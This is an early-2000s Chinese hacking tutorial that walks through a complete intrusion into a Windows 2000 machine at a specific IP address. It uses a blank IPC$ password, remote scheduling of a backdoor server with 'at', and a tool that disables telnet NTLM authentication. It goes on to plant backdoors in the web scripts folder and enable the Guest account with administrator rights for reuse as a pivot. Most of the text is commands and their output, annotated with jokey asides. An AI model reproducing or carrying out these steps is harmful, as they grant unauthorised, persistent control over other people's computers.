|
|
?大家好,由于时间的关系。我对此漏洞不作详细讲述。而且要扫描IPC$主机,需要大量的时间。所以我不推荐你用此方法攻击!
需要系统:Windows 2000 (Windows 98 不可以进行入侵!)
需要软件:流光 (请大家到小榕的网站里下载:http://www.netxeyes.com)
以下为一次入侵过程:(很久以前写的一篇文章!入侵的主机为台湾版Windows 2000 所以在攻击的过程中,会出现乱码!)
* 注意:“*”后的文字均为注释。
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
D:\>net use \\211.21.253.166\IPC$ "" /user:"davis"
命令成功完成。
* 这是我用流光扫到的密码~~~我们就拿它开刀吧~!
D:\>copy srv.exe \\211.21.253.166\admin$
已复制 1 个文件。
* 先复制srv.exe上去,在流光的Tools目录就有。
D:\>net time \\211.21.253.166 。
\\211.21.253.166 的当前时间是 2001/1/17 上午 10:48
命令成功完成。
* 查查时间
D:\>at \\211.21.253.166 10:50 srv.exe
新加了一项作业,其作业 ID = 1
* 用at命令启动srv.exe吧~!(这里设置的时间要比主机时间快)然后去论坛灌几篇帖子。
D:\>net time \\211.21.253.166
\\211.21.253.166 的当前时间是 2001/1/17 上午 10:51
命令成功完成。
* 再查查够时间没有?!噢~~够了~
D:\>telnet 211.21.253.166 99
* 我们telnet吧,注意端口是99哦~
Microsoft Windows 2000 [セ 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
* 噢~~成功了!
D:\>copy ntlm.exe \\211.21.253.166\admin$
已复制 1 个文件。
* 我们再开一个DOS窗口,把ntlm.exe上传到主机上。(也是在流光流光的Tools目录)
Microsoft Windows 2000 [セ 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>ntlm
ntlm
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
* 我们输入ntlm启动吧。
C:\WINNT\system32>
C:\WINNT\system32>net start telnet
net start telnet
Telnet 狝叭タ币笆 .
Telnet 狝叭竒币笆Θ
* 然后直接用net start telnet启动telnet。
C:\WINNT\system32>
C:\WINNT\system32>
* 这个窗口已经没用了,关了它吧!
D:\>telnet 211.21.253.166 99
* 我们在开一个DOS窗口,然后telnet上去。
NTLM Authentication failed due to insufficient credentials. Please login with
clear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login: davis //输入用户名
password:
* 输入密码(密码是空的,所以不用输入)
*===============================================================
舧ㄏノ Microsoft Telnet Server
*===============================================================
C:\>copy c:\winnt\system32\srv.exe c:\inetpub\scripts
╰参тぃ﹚郎
* 留个后门吧。
C:\>copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\xiao.exe
狡籹 1 郎
* 再留多个后门。
C:\>net user guest /active:yes
磅︽Θ
* 将Guest用户激活.
C:\>net user guest hacker
磅︽Θ
* 将Guest的密码改为hacker,或者你要设定的密码。
C:\>net localgroup administrators guest /add
磅︽Θ
* 将Guest变为Administrator。^_^
如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机.
后门够多了吧~~~~呵呵~~一个跳板就做好了!
C:\>
OK!
